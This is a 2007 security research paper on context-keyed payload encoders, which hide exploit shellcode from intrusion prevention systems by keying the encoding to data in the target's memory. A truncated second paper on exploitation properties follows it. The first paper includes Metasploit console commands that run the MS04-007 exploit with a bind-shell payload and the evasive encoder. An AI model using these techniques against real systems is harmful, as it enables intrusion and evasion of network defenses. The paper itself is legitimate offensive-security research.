Preventing Payload Disclosure via Context
|
||||
October, 2007
|
||||
I)ruid, C²ISSP
|
||||
druid@caughq.org
|
||||
http://druid.caughq.org
|
||||
|
||||
Abstract
|
||||
|
||||
A common goal of payload encoders is to evade a third-party detection mechanism which
|
||||
is actively observing attack traffic somewhere along the route from an attacker
|
||||
to their target, filtering on commonly used payload instructions. The use of
|
||||
a payload encoder may be easily detected and blocked as well as opening up the
|
||||
opportunity for the payload to be decoded for further analysis. Even
|
||||
so-called keyed encoders utilize easily observable, recoverable, or guessable
|
||||
key values in their encoding algorithm, thus making decoding on-the-fly
|
||||
trivial once the encoding algorithm is identified. It is feasible that an
|
||||
active observer may make use of the inherent functionality of the decoder stub
|
||||
to decode the payload of a suspected exploit in order to inspect the contents
|
||||
of that payload and make a control decision about the network traffic. This
|
||||
paper presents a new method of keying an encoder which is based entirely on
|
||||
contextual information that is predictable or known about the target by the
|
||||
attacker and constructible or recoverable by the decoder stub when executed at
|
||||
the target. An active observer of the attack traffic however should be unable
|
||||
to decode the payload due to lack of the contextual keying information.
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
In the art of vulnerability exploitation there are often numerous hurdles that
|
||||
one must overcome. Examples of hurdles can be seen as barriers to traversing
|
||||
the attack vector and challenges with developing an effective vulnerability
|
||||
exploitation technique. A critical step in the later inevitabley requires the
|
||||
use of an exploit payload, traditionally referred to as shellcode. A payload
|
||||
is the functional exploit component that implements the exploit's purpose[1].
|
||||
|
||||
One barrier to successful exploitation may be that including certain byte
|
||||
values in the payload will not allow the payload to reach its destination in
|
||||
an executable form[2], or even at all. Another hurdle to overcome may be that an
|
||||
in-line network security monitoring device such as an Intrusion Prevention
|
||||
System (IPS) could be filtering network traffic for the particular payload
|
||||
that the exploit intends to deliver[3, 288-289], or otherwise extracting the
|
||||
payload for further automated analysis[4][5, 2]. Whatever the hurdle may be,
|
||||
many challenges relating to the payload portion of the exploit can be overcome
|
||||
by employing what is known as a payload encoder.
|
||||
|
||||
1.1) Payload Encoders
|
||||
|
||||
Payload encoders provide the utility of obfuscating the exploit's payload
|
||||
while it is in transit. Once the payload has reached its target, the payload
|
||||
is decoded prior to execution on the target system. This allows the
|
||||
payload to bypass various controls and restrictions of the type mentioned
|
||||
previously while still remaining in an executable form. In general, an
|
||||
exploit's payload will be encoded prior to packaging in the exploit itself
|
||||
and what is known as a decoder stub will be prepended to the
|
||||
encoded payload which produces a new, slightly larger payload. This new
|
||||
payload is then packaged within the exploit in favor of the original.
|
||||
|
||||
1.1.1) Encoder
|
||||
|
||||
The encoder can take many forms and provide its function in a number of
|
||||
different ways. At its most basic definition, an encoder is simply a function
|
||||
used when packaging a payload for use by an exploit which encodes the payload
|
||||
into a different form than the original. There are many different encoders
|
||||
available today, some of which provide encoding such as alphanumeric
|
||||
mixed-case text[6], Unicode safe mix-cased text[7], UTF-8 and tolower()
|
||||
safe[2], and XOR against a 4-byte key[8]. There is also an extremely
|
||||
impressive polymorphic XOR additive feedback encoder available called Shikata
|
||||
Ga Nai[9].
|
||||
|
||||
1.1.2) Decoder Stub
|
||||
|
||||
The decoder stub is a small chunk of instructions that is prepended to the
|
||||
encoded payload. When this new payload is executed on the target system, the
|
||||
decoder stub executes first and is responsible for decoding the original
|
||||
payload data. Once the original payload data is decoded, the decoder stub
|
||||
passes execution to the original payload. Decoder stubs generally perform a
|
||||
reversal of the encoding function, or in the case of an XOR obfuscation
|
||||
encoding, simply perform the XOR again against the same key value.
|
||||
|
||||
1.1.3) Example: Metasploit Alpha2 Alphanumeric Mixedcase Encoder (x86)
|
||||
|
||||
The Metasploit Alpha2 Alphanumeric Mixedcase Encoder[6] encodes payloads as
|
||||
alphanumeric mixedcase text using SkyLined's Alpha2 encoding suite. This
|
||||
allows a payload encoded with this encoder to traverse such attack vectors as
|
||||
may require input to pass text validation functions such as the C89 standard
|
||||
functions isalnum() and isprint(), as well as the C99 standard function
|
||||
isascii().
|
||||
|
||||
1.1.4) Keyed Encoders
|
||||
|
||||
Many encoders utilize encoding techniques which require a key value. The
|
||||
Call+4 Dword XOR encoder[8] and the Shikata Ga Nai polymorphic XOR additive
|
||||
feedback encoder[9] are examples of keyed encoders.
|
||||
|
||||
Key Selection
|
||||
|
||||
Encoders which make use of key data during their encoding process have
|
||||
traditionally used either random or static data chosen at the time of
|
||||
encoding, or data that is tied to the encoding process itself[10], such as the
|
||||
index value of the current position in the buffer being operated on, or a
|
||||
value relative to that index.
|
||||
|
||||
Example: Metasploit Single-byte XOR Countdown Encoder (x86)
|
||||
|
||||
The Metasploit Single-byte XOR Countdown Encoder[10] uses the length of the
|
||||
remaining payload to be operated upon as a position-dependent encoder key.
|
||||
The benefit that this provides is a smaller decoder stub, as the decoder stub
|
||||
does not need to contain any static keying information. Instead, it tracks
|
||||
the length property of the payload as it decodes and uses that information as
|
||||
the key.
|
||||
|
||||
Weaknesses
|
||||
|
||||
The most significant weakness of most keyed encoders available today is that
|
||||
the keying information that is used is either observable directly or
|
||||
constructable from the observed decoder stub. Either the static key
|
||||
information is transmitted within the exploit as part of the decoder stub
|
||||
itself, or the key information is reproducible once the encoding algorithm is
|
||||
known. Knowledge of the encoding algorithm is usually obtainable by
|
||||
recognizing known decoder stubs or analyzing unknown decoder stubs
|
||||
instructions in detail.
|
||||
|
||||
The expected inherent functionality of the decoder stub also introduces a
|
||||
weakness. Modern payload encoders rely upon the decoder stub's ability to
|
||||
properly decode the payload at run-time. It is feasible that an active
|
||||
observer may exploit this inherent functionality to decode a suspected payload
|
||||
within a sandbox environment in real-time[5,3] in order to inspect the contents of
|
||||
the payload and make a control decision about the network traffic it was found
|
||||
in. Because the decoder stub requires only that it is being executed by a
|
||||
processor that will understand its instruction-set, producing such a sandbox
|
||||
is trivial.
|
||||
|
||||
Unfortunately, all of the aforementioned keyed encoders include the static key
|
||||
value directly in their decoder stubs and are thus vulnerable to the
|
||||
weaknesses described here. This allows an observer of the encoded payload in
|
||||
transit to potentially decode the payload and inspect it's content.
|
||||
Fortunately, all of the keyed encoders previously mentioned could potentially
|
||||
be improved to use contextual keying as is described in the following chapter.
|
||||
|
||||
2) Contextual Keying
|
||||
|
||||
Contextual keying is defined as the process of selecting an encoding key from
|
||||
context information that is either known or predictable about the target. A
|
||||
context-key is defined as the result of that process. The context information
|
||||
available about the exploit's target may contain any number of various types
|
||||
of information, dependent upon the attacker's proximity to the target,
|
||||
knowledge of the target's operation or internals, or knowledge of the target's
|
||||
environment.
|
||||
|
||||
2.1) Encoder
|
||||
|
||||
When utilizing a context-key, the method of encoding is largely unchanged from
|
||||
current methods. The exploit crafter simply passes the encoding function the
|
||||
context-key as its static key value. The size of the context-key is dependent
|
||||
upon the requirements of the encoder being used; however, it is feasible that
|
||||
the key may be of any fixed length, or ideally the same size as the payload
|
||||
being encoded.
|
||||
|
||||
2.2) Decoder Stub
|
||||
|
||||
The decoder stub that requires a context-key is not only responsible for
|
||||
decoding the encoded payload but is also responsible for retrieving or
|
||||
otherwise generating its context-key from the information that is available to
|
||||
it at run-time. This may include retrieving a value from a known memory
|
||||
address, performing some calculation on other information available to it, or
|
||||
any number of other possible scenarios. The following section will explore
|
||||
some of the possibilities.
|
||||
|
||||
2.3) Application Specific Keys
|
||||
|
||||
2.3.1) Static Application Data
|
||||
|
||||
If the attacker has the convenience of reproducing the operating environment
|
||||
and execution of the target application, or even simply has access to the
|
||||
application's executable, a context-key may be chosen from information known
|
||||
about the address space of the running process. Known locations of static
|
||||
values such as environment variables, global variables and constants such as
|
||||
version strings, help text, or error messages, or even the application's
|
||||
instructions or linked library instructions themselves may be chosen from as
|
||||
contextual keying information.
|
||||
|
||||
Profiling the Application
|
||||
|
||||
To successfully select a context-key from a running application's memory, the
|
||||
application's memory must first be profiled. By polling the application's
|
||||
address space over a period of time, ranges of memory that change can be
|
||||
eliminated from the potential context-key data pool. The primary requirement
|
||||
of viable data in the process's memory space is that it does not
|
||||
change over time or between subsequent instantiations of the running
|
||||
application. After profiling is complete, the resultant list of memory
|
||||
addresses and static data will be referred to as the application's
|
||||
memory map.
|
||||
|
||||
Memory Map Creation
|
||||
|
||||
The basic steps to create a comprehensive memory map of a running process are:
|
||||
|
||||
1. Attach to the running process.
|
||||
2. Initialize the memory map with a poll of non-null bytes in the running
|
||||
process's virtual memory.
|
||||
3. Wait an arbitrary amount of time.
|
||||
4. Poll the process's virtual memory again.
|
||||
5. Find the differential between the contents of the memory map and the most
|
||||
recent memory poll.
|
||||
6. Eliminate any data that has changed between the two from the memory map.
|
||||
7. Optionally eliminate any memory ranges shorter than your desired key length.
|
||||
8. Go to step 3.
|
||||
|
||||
Continue the above process until changing data is no longer being eliminated
|
||||
and store the resulting memory map as a map of that instance of the target
|
||||
process. Restart the application and repeat the above process, producing a
|
||||
second memory map for the second instance of the target process. Compare the
|
||||
two memory maps for differences and again eliminate any data that differs.
|
||||
Repeat this process until changing data is no longer being eliminated.
|
||||
|
||||
The resulting final memory map for the process must then be analyzed for
|
||||
static data that may be directly relative to the environment of the process
|
||||
and may not be consistent across processes running within different
|
||||
environments such as on different hosts or in different networks. This type
|
||||
of data includes network addresses and ports, host names, operating system
|
||||
"unames", and so forth. This type of data may also include installation
|
||||
paths, user names, and other user-configurable options during installation of
|
||||
the application. This type of data does not include application version
|
||||
strings or other pertinent information which may be directly relative to the
|
||||
properties of the application which contribute to the application being
|
||||
vulnerable and successfully exploited.
|
||||
|
||||
Identifying this type of information relative to the application's environment
|
||||
will produce two distinct types of memory map data; one type containing static
|
||||
application context data, and the other type containing environment context
|
||||
data. Both of these types of data can be useful as potential context-key
|
||||
values, however, the former will be more portable amongst targets whereas the
|
||||
latter will only be useful when selecting key values for the actual target
|
||||
process that was actively profiled. If it is undesirable, introducing
|
||||
instantiation of processes being profiled on different network hosts and with
|
||||
different installation configuration options to the memory map generation
|
||||
process outlined above will likely eliminate the latter from the memory map
|
||||
entirely.
|
||||
|
||||
Finally, the memory maps can be trimmed of any remaining NULL bytes to reduce
|
||||
their size. The final memory map should consist of records containing memory
|
||||
addresses and the string of static data which can be found in memory at those
|
||||
locations.
|
||||
|
||||
Memory Map Creation Methods
|
||||
|
||||
Metasploit Framework's msfpescan
|
||||
|
||||
One method to create a memory map of viable addresses and values is to use a
|
||||
tool provided by the Metasploit Framework called msfpescan. msfpescan is
|
||||
designed to scan PE formatted executable files and return the requested
|
||||
portion of the .text section of the executable. Data found in the .text
|
||||
section is useful as potential context-key data as the .text section is marked
|
||||
read-only when mapped into a process' address space and is therefore static
|
||||
and will not change. Furthermore, msfpescan predicts where in the executed
|
||||
process' address space these static values will be located, thus providing
|
||||
both the static data values as well as the addresses at which those values can
|
||||
be retrieved.
|
||||
|
||||
To illustrate, suppose a memory map for the Windows System service needs to be
|
||||
created for exploitation of the vulnerability described in Microsoft Security
|
||||
Bulletin MS06-040[11] by an exploit which will employ a context-keyed payload
|
||||
encoder. A common DLL that is linked into the service's executable when
|
||||
compiled can be selected as the target for msfpescan. In this case,
|
||||
ws2help.dll is chosen due to its lack of updates since August 23rd, 2001.
|
||||
Because this particular DLL has remained unchanged for over six years, its
|
||||
instructions provide a particularly consistent cache of potential context-keys
|
||||
for an exploit targeting an application linked against it anytime during the
|
||||
last six years. A scan of the first 1024 bytes of ws2help.dll's executable
|
||||
instructions can be performed by executing the following command:
|
||||
|
||||
msfpescan -b 0x0 -A 1024 ws2help.dll
|
||||
|
||||
Furthermore, msfpescan has been improved via this research effort to render
|
||||
data directly as a memory map. This improved version is available in the
|
||||
Metasploit Framework as of version 3.1. A scan and dump to memory map of
|
||||
ws2help.dll's executable instructions can be performed by executing the
|
||||
following command:
|
||||
|
||||
msfpescan --context-map context ws2help.dll
|
||||
|
||||
It is important to note that this method of memory map generation is much less
|
||||
comprehensive than the method previously outlined; however, when targeting a
|
||||
process whose executable is relatively large and links in a large number of
|
||||
libraries, profiling only the instruction portions of the executable and
|
||||
library files involved may provide an adequately-sized memory map for
|
||||
context-key selection.
|
||||
|
||||
Metasploit Framework's memdump.exe
|
||||
|
||||
The Metasploit Framework also provides another useful tool for the profiling
|
||||
of a running process' memory called memdump.exe. memdump.exe is used to dump
|
||||
the entire memory space of a running process. This tool can be used to
|
||||
provide the polling step of the memory map creation process previously
|
||||
outlined. By producing multiple memory dumps over a period of time, the dumps
|
||||
can be compared to isolate static data.
|
||||
|
||||
smem-map
|
||||
|
||||
A tool for profiling a Linux process' address space and creating a memory map
|
||||
is provided by this research effort. The smem-map tool[12] was created as a
|
||||
reference implementation of the process outlined at the beginning of this
|
||||
section. smem-map is a Linux command-line application and relies on the proc
|
||||
filesystem as an interface to the target process' address space.
|
||||
|
||||
The first time smem-map is used against a target process, it will populate an
|
||||
initial memory map with all non-null bytes currently found in the process's
|
||||
virtual memory. Subsequent polls of the memory ranges that were initially
|
||||
identified will eliminate data that has changed between the memory map and the
|
||||
most recent poll of the process's memory. If the tool is stopped and
|
||||
restarted and the specified memory map file exists, the file will be reloaded
|
||||
as the memory map to be compared against instead of populating an entirely new
|
||||
memory map. Using this functionality, a memory map can be refined over
|
||||
multiple sessions of the tool as well as multiple instantiations of the target
|
||||
process. A scan of a running process' address space can be performed by
|
||||
executing the following command:
|
||||
|
||||
smem-map <PID> output.map
|
||||
|
||||
Context-Key Selection
|
||||
|
||||
Once a memory map has been created for the target application, the encoder may
|
||||
select any sequential data from any memory address within the memory map which
|
||||
is both large enough to fill the desired key length and also does not produce
|
||||
any disallowed byte values in the encoded payload as defined by restrictions
|
||||
to the attack vector for the vulnerability. The decoder stub should then
|
||||
retrieve the context-key from the same memory address when executed at the
|
||||
target. If the decoder stub is developed so that it may read individual bytes
|
||||
of data from different locations, the encoder may select individual bytes from
|
||||
multiple addresses in the memory map. The encoder must note the memory
|
||||
address or addresses at which the context-key is read from the memory map for
|
||||
inclusion in the decoder stub.
|
||||
|
||||
Proof of Concept: Improved Shikata ga Nai
|
||||
|
||||
The Shikata ga Nai encoder[9], included with the Metasploit Framework, implements
|
||||
polymorphic XOR additive feedback encoding against a four byte key. The
|
||||
decoder stub that is prepended to a payload which has been encoded by Shikata
|
||||
ga Nai is generated based on dynamic instruction substitution and dynamic
|
||||
block ordering. The registers used by the decoder stub instructions are also
|
||||
selected dynamically when the decoder stub is constructed.
|
||||
|
||||
Improving the original Metasploit implementation of Shikata ga Nai to use
|
||||
contextual keying was fairly trivial. Instead of randomly selecting a four
|
||||
byte key prior to encoding, a key is instead chosen from a supplied memory
|
||||
map. Furthermore, when generating the decoder stub, the original
|
||||
implementation used a "mov reg, val" instruction (0xb8) to move the key value
|
||||
directly from its location in the decoder stub into the register it will use
|
||||
for the XOR operation. The context-key version instead uses a "mov reg,
|
||||
[addr]" instruction (0xa1) to retrieve the context-key from the memory
|
||||
location at [addr] and store it in the same register. The update to the
|
||||
Shikata ga Nai decoder stub was literally as simple as changing one
|
||||
instruction, and providing that instruction with the context-key's location
|
||||
address rather than a static key value directly.
|
||||
|
||||
|
||||
The improved version of Shikata ga Nai described here is provided by this
|
||||
research effort and is available in the Metasploit Framework as of version
|
||||
3.1. It can be utilized as follows from the Metasploit Framework Console
|
||||
command-line, after the usual exploit and payload commands:
|
||||
|
||||
set ENCODER x86/shikata_ga_nai
|
||||
set EnableContextEncoding 1
|
||||
set ContextInformationFile <application.map>
|
||||
exploit
|
||||
|
||||
Case Study: MS04-007 vs. Windows XP SP0
|
||||
|
||||
The Metasploit framework currently provides an exploit for the vulnerability
|
||||
described in Microsoft Security Bulletin MS04-007[13]. The vulnerable application
|
||||
in this case is the Microsoft ASN.1 Library.
|
||||
|
||||
Before any exploitation using contextual keying can take place, the vulnerable
|
||||
application must be profiled. By opening the affected library from Windows XP
|
||||
Service Pack 0 in a debugger, a list of libraries that it itself includes can
|
||||
be gleaned. By collecting said library DLL files from the target vulnerable
|
||||
system, or an equivalent system in the lab, msfpescan can then be used to
|
||||
create a memory map:
|
||||
|
||||
msfpescan --context-map context \
|
||||
ms04-007-dlls/*
|
||||
cat context/* >> ms04-007.map
|
||||
|
||||
After the memory map has been created, it can be provided to Metasploit and
|
||||
Shikata ga Nai to encode the payload that Metasploit will use to exploit the
|
||||
vulnerable system:
|
||||
|
||||
use exploit/windows/smb/ms04-007-killbill
|
||||
set PAYLOAD windows/shell_bind_tcp
|
||||
set ENCODER x86/shikata_ga_nai
|
||||
set EnableContextEncoding 1
|
||||
set ContextInformationFile ms04-007.map
|
||||
exploit
|
||||
|
||||
2.3.2) Event Data
|
||||
|
||||
Similar to the static application data approach, transient data may also be
|
||||
used as a context-key so long as it persists long enough for the decoder stub
|
||||
to access it. Consider the scenario of a DNS server which is vulnerable to an
|
||||
overflow when parsing an incoming host name or address look-up request. If
|
||||
portions of the request are stored in memory prior to the vulnerability being
|
||||
triggered, the data provided by the request could potentially be used for
|
||||
contextual keying if it's location is predictable. Values such as IP
|
||||
addresses, port numbers, packet sequence numbers, and so forth are all
|
||||
potentially viable for use as a context-key.
|
||||
|
||||
2.3.3) Supplied Data
|
||||
|
||||
Similar to Event Data, an attacker may also be able to supply key data for
|
||||
later use to the memory space of the target application prior to exploitation.
|
||||
Consider the scenario of a caching HTTP proxy that exhibits the behavior of
|
||||
keeping recently requested resources in memory for a period of time prior to
|
||||
flushing them to disk for longer-term storage. If the attacker is aware of
|
||||
this behavior, the potential exists for the attacker to cause the proxy to
|
||||
retrieve a malicious web resource which contains a wealth of usable
|
||||
context-key data. Even if the attacker cannot predict where in memory the
|
||||
data may be stored, by having control of the data that is being stored other
|
||||
exploitation techniques such as egg hunting[14, 9][15] may be used by a
|
||||
decoder-stub to locate and retrieve context-key information when its exact
|
||||
location is unknown.
|
||||
|
||||
2.4) Temporal Keys
|
||||
|
||||
The concept of a temporal address was previously introduced by the paper
|
||||
entitled Temporal Return Addresses: Exploitation Chronomancy[16, 3]. In
|
||||
summary, a temporal address is a location in memory which holds timer data of
|
||||
some form. Potential types of timer data stored at a temporal address include
|
||||
such data as the system date and time, number of seconds since boot, or a
|
||||
counter of some other form.
|
||||
|
||||
The research presented in the aforementioned paper focused on leveraging the
|
||||
timer data found at such addresses as the return address used for
|
||||
vulnerability exploitation. As such, the viability of the data found at the
|
||||
temporal address was constrained by two properties of the data defined as
|
||||
scale, and period. These two properties dictate the window of time during
|
||||
which the data found at the temporal address will equate to the desired
|
||||
instructions. Another potential constraint for use of a temporal address as
|
||||
an exploit return address stems from the fact that the value contained at the
|
||||
temporal address is called directly for use as an executable instruction. If
|
||||
the memory range it is contained within is marked as non-executable such as
|
||||
with the more recent versions of Windows[16, 19], attempting use in this manner
|
||||
will cause an exception.
|
||||
|
||||
For the purpose that temporal addresses will be employed here, such strict
|
||||
constraints as those previously mentioned do not exist. Rather, the only
|
||||
desired property of the data stored at the temporal address which will be used
|
||||
as a context-key is that it does not change, or as in the case of temporal
|
||||
data, does not change during the time window in which we intend to use it.
|
||||
Due to this difference in requirements, the actual content of the temporal
|
||||
address is somewhat irrelevant and therefore is not constrained to a
|
||||
time-window in either the future or the past during which the data found at
|
||||
the temporal address will be fit for purpose. The viable time-window in the
|
||||
case of use for contextual keying is entirely constrained by duration rather
|
||||
than location along the time-line. Due to the values at different byte
|
||||
offsets within data found at a temporal address having differing update
|
||||
frequencies, selection of key data from these values produces varying duration
|
||||
time-windows during which the values will remain constant. By using single
|
||||
byte, dual byte, or otherwise relatively short context-keys, and carefully
|
||||
selecting from the available byte values stored within the timer found at the
|
||||
temporal address, the viable time-window chosen can be made to be quite
|
||||
lengthy.
|
||||
|
||||
2.4.1) Context-Key Selection
|
||||
|
||||
Provided by the previously mentioned temporal return address research effort
|
||||
is a very useful tool called telescope[16, 8]. The tool's function is to analyze a
|
||||
running process' memory for potential temporal addresses and report them to
|
||||
the user. By using this tool, potential context-key values and the addresses
|
||||
at which they reside can be respectively predicted and identified.
|
||||
|
||||
The temporal return addresses paper also revealed a section of memory that is
|
||||
mapped into all processes running on Windows NT, or any other more recent
|
||||
Windows system, called SharedUserData[16, 17]. The interesting properties of the
|
||||
SharedUserData region of a process' address space is that it is always mapped
|
||||
into memory at a predictable location and is required to be backwards
|
||||
compatible with previous versions. As such, the individual values contained
|
||||
within the region will always be at the same offset to it's predictable base
|
||||
address. One of the values contained within this region of memory is the
|
||||
system time, which will be used in the examples to follow.
|
||||
|
||||
Remotely Determining Time
|
||||
|
||||
Methods and techniques for profiling a target system's current time is outside
|
||||
of the scope of this paper, however the aforementioned paper on temporal
|
||||
return addresses[16, 13-15] offers some insight. Once a target system's
|
||||
current time has been identified, the values found at various temporal
|
||||
addresses in memory can be readily predicted to varying degrees of accuracy.
|
||||
|
||||
Time-Window Selection
|
||||
|
||||
It is important to note that when using data stored at a temporal address as a
|
||||
context-key, parts of that value are likely to be changing frequently.
|
||||
Fortunately, the key length being used may not require use of the entire timer
|
||||
value, and as such the values found at the byte offsets that are frequently
|
||||
changing can likely be ignored. Consider the SystemTime value from the
|
||||
Windows SharedUserData region of memory. SystemTime is a 100 nanosecond timer
|
||||
which is measured from January 1st, 1601, is stored as a KSYSTEM_TIME
|
||||
structure, and is located at memory address 0x7ffe0014 on all versions of
|
||||
Windows NT[16, 16]:
|
||||
|
||||
0:000> dt _KSYSTEM_TIME
|
||||
+0x000 LowPart : Uint4B
|
||||
+0x004 High1Time : Int4B
|
||||
+0x008 High2Time : Int4B
|
||||
|
||||
Due to this timer's frequent update period, granularity, and scale, some of
|
||||
the data contained at the temporal address will be too transient for use as a
|
||||
context-key. The capacity of SystemTime is twelve bytes, however due to the
|
||||
four bytes labeled as High2Time having an identical value as the four bytes
|
||||
labeled as High1Time, only the first eight bytes are relevant as a timer. As
|
||||
shown by the calculations provided by the temporal return addresses paper[16,
|
||||
10], reproduced below as Figure , it is only worth focusing on values
|
||||
beginning at byte index four of the SystemTime value, or the four bytes
|
||||
labeled as High1Time located at address 0x7ffe0018.
|
||||
|
||||
+------+----------------------------------+
|
||||
| Byte | Seconds (ext) |
|
||||
+------+----------------------------------+
|
||||
| 0 | 0 (zero) |
|
||||
| 1 | 0 (zero) |
|
||||
| 2 | 0 (zero) |
|
||||
| 3 | 1 (1 sec) |
|
||||
| 4 | 429 (7 mins 9 secs) |
|
||||
| 5 | 109951 (1 day 6 hours 32 mins) |
|
||||
| 6 | 28147497 (325 days 18 hours) |
|
||||
| 7 | 7205759403 (228 years 179 days) |
|
||||
+------+----------------------------------+
|
||||
|
||||
It is also interesting to note that if the payload encoder only utilizes a
|
||||
single byte context-key, it may not even be required that the attacker
|
||||
determine the target system's time, as the value at byte index six or seven of
|
||||
the SystemTime value could be used requiring only that the attacker guess the
|
||||
system time to within a little less than a year, or to within 228 years,
|
||||
respectively.
|
||||
|
||||
3) Weaknesses
|
||||
|
||||
Due to the cryptographically weak properties of using functions such as XOR to
|
||||
obfuscate data, there exist well known attacks against these methods and their
|
||||
keying information. Although payload encoders which employ XOR as their
|
||||
obfuscation algorithm have been discussed extensively throughout this paper,
|
||||
it is not the author's intent to tie the the contextual keying technique
|
||||
presented here to such algorithms. Rather, contextual keying could just as
|
||||
readily be used with cryptographically strong encoding algorithms as well. As
|
||||
such, attacks against the encoding algorithm used, or specifically against the
|
||||
XOR algorithm, are outside the scope of this paper and will not be detailed
|
||||
herein.
|
||||
|
||||
4) Conclusion
|
||||
|
||||
While the use of context-keyed payload encoders likely won't prevent a
|
||||
dedicated forensic analyst from successfully performing an off-line analysis
|
||||
of an exploit's encoded payload, the system it was targeting, and the target
|
||||
application in an attempt to discover the key value used, use of the
|
||||
contextual keying technique will prevent an automated system from decoding the
|
||||
payload in real-time if it does not have access to, or an automated method of
|
||||
constructing, an adequate memory map of the target from which to retrieve the
|
||||
key.
|
||||
|
||||
As systems hardware technology and software capability continue to improve,
|
||||
network security and monitoring systems will likely begin to join the few
|
||||
currently existing systems[5, 2-4][4] that attempt to perform this type of real-time
|
||||
analysis of suspected network exploit traffic, and more specifically, exploit
|
||||
payloads.
|
||||
|
||||
4.1) Acknowledgments
|
||||
|
||||
The Author would like to thank H.D. Moore and Matt Miller a.k.a. skape for
|
||||
their assistance in development of the improved Metasploit implementation of
|
||||
the Shikata ga Nai payload encoder as Proof of Concept as well as the
|
||||
supporting tools provided by this research effort.
|
||||
|
||||
References
|
||||
|
||||
[1] Ivan Arce. The shellcode generation. IEEE Security & Privacy,
|
||||
2(5):72-76, 2004.
|
||||
|
||||
[2] skape. Implementing a custom x86 encoder. Uninformed Journal, 5(3),
|
||||
September 2006.
|
||||
|
||||
[3] Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel
|
||||
Mehta, Riley Hassell. The Shellcoder's Handhook: Discovering and
|
||||
Exploiting Security Holes. John Wiley & Sones, 2004.
|
||||
|
||||
[4] Paul Baecher and Markus Koetter. libemu. http://libemu.mwcollect.org/,
|
||||
2007.
|
||||
|
||||
[5] R. Smith, A. Prigden, B. Thomason, and V. Shmatikov. Shellshock: Luring
|
||||
malware into virtual honeypots by emulated response. October 2005.
|
||||
|
||||
[6] SkyLined and Pusscat. Alpha2 alphanumeric mixedcase encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:alpha_mixed.
|
||||
|
||||
[7] SkyLined and Pusscat. Alpha2 alphanumeric unicode mixedcase encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:unicode_mixed.
|
||||
|
||||
[8] H.D. Moore and spoonm. Call+4 dword xor encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:call4_dword_xor.
|
||||
|
||||
[9] spoonm. Polymorphic xor additive feedback encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:shikata_ga_nai.
|
||||
|
||||
[10] vlad902. Single-byte xor countdown encoder (x86).
|
||||
http://framework.metasploit.com/encoders/view/?refname=x86:countdown.
|
||||
|
||||
[11] Microsoft. Microsoft security bulletin ms06-040.
|
||||
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx, August
|
||||
2006.
|
||||
|
||||
[12] |)ruid. smem-map - the static memory mapper.
|
||||
https://sourceforge.net/projects/smem-map.
|
||||
|
||||
[13] Microsoft. Microsoft security bulletin ms04-007.
|
||||
http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx,
|
||||
February, 2004.
|
||||
|
||||
[14] The Metasploit Staff. Metasploit 3.0 Developer's Guide.
|
||||
The Metasploit Project, December 2005.
|
||||
|
||||
[15] skape. Safely searching process virtual address space.
|
||||
http://hick.org/code/skape/papers/egghunt-shellcode.pdf, September 2004.
|
||||
|
||||
[16] skape. Temporal return addresses. Uninformed Journal, 2(2), September
|
||||
2005.
|
||||
|
||||
[17] SweetScape Software. 010 editor. http://www.sweetscape.com/010editor/,
|
||||
2002.
|
||||
|
||||
[18] |)ruid. Memorymap.bt. http://druid.caughq.org/src/MemoryMap.bt, 2007.
|
||||
|
||||
Appendix
|
||||
|
||||
A) Memory Map File Specification
|
||||
|
||||
The memory map files created by this research effort's supporting tools adhere
|
||||
to the file format specification described here. The file format is designed
|
||||
specifically to be simple, light weight, and versatile.
|
||||
|
||||
A.1) File Format
|
||||
|
||||
An entire memory map file is comprised of individual data records concatenated
|
||||
together. These individual data records represent a chunk of data found in a
|
||||
process's memory space. This simple format allows for multiple memory map
|
||||
files to be further concatenated to produce a single larger memory map file.
|
||||
Individual data records are comprised of the following elements:
|
||||
|
||||
+----------+------------+--------------+
|
||||
| Bit-Size | Byte-Order | Element |
|
||||
+----------+------------+--------------+
|
||||
| 8 | n/a | Data Type |
|
||||
| 32 | big-endian | Base Address |
|
||||
| 32 | big-endian | Size |
|
||||
| Size | n/a | Data |
|
||||
+----------+------------+--------------+
|
||||
|
||||
A.2) Data Type Values
|
||||
|
||||
The Data Type values are currently defined in the following table:
|
||||
|
||||
+-------+-------------------+
|
||||
| Value | Type |
|
||||
+-------+-------------------+
|
||||
| 0 | Reserved |
|
||||
| 1 | Static Data |
|
||||
| 2 | Temporal Data |
|
||||
| 3 | Environment Data |
|
||||
+-------+-------------------+
|
||||
|
||||
A.3) File Parsing
|
||||
|
||||
Parsing of a memory map file is as simple as beginning with the first byte in
|
||||
the file, reading the first three elements of the data record as they are of
|
||||
fixed size, then using the last of those three elements as size indicator to
|
||||
read the final element. If any data remains in the file, there is at least
|
||||
one more data record to be read.
|
||||
|
||||
To provide for easy parsing and review of memory map files, an 010 Editor
|
||||
template is provided by this research effort.
|
875
uninformed/9.4.txt
Normal file
875
uninformed/9.4.txt
Normal file
|
@ -0,0 +1,875 @@
|
|||
Improving Software Security Analysis using Exploitation Properties
|
||||
12/2007
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
Abstract
|
||||
|
||||
Reliable exploitation of software vulnerabilities has continued to become more
|
||||
difficult as formidable mitigations have been established and are now included
|
||||
by default with most modern operating systems. Future exploitation of
|
||||
software vulnerabilities will rely on either discovering ways to circumvent
|
||||
these mitigations or uncovering flaws that are not adequately protected.
|
||||
Since the majority of the mitigations that exist today lack universal bypass
|
||||
techniques, it has become more fruitful to take the latter approach. It is in
|
||||
this vein that this paper introduces the concept of exploitation properties
|
||||
and describes how they can be used to better understand the exploitability of
|
||||
a system irrespective of a particular vulnerability. Perceived exploitability
|
||||
is of utmost importance to both an attacker and to a defender given the
|
||||
presence of modern mitigations. The ANI vulnerability (MS07-017) is used to
|
||||
help illustrate these points by acting as a simple example of a vulnerability
|
||||
that may have been more easily identified as code that should have received
|
||||
additional scrutiny by taking exploitation properties into consideration.
|
||||
|
||||
1) Introduction
|
||||
|
||||
Modern exploit mitigations have become formidable opponents with respect to
|
||||
the effect they have on reliable exploitation. Some of the more substantial
|
||||
modern mitigations include GuardStack (GS), SafeSEH, DEP (NX), ASLR, pointer
|
||||
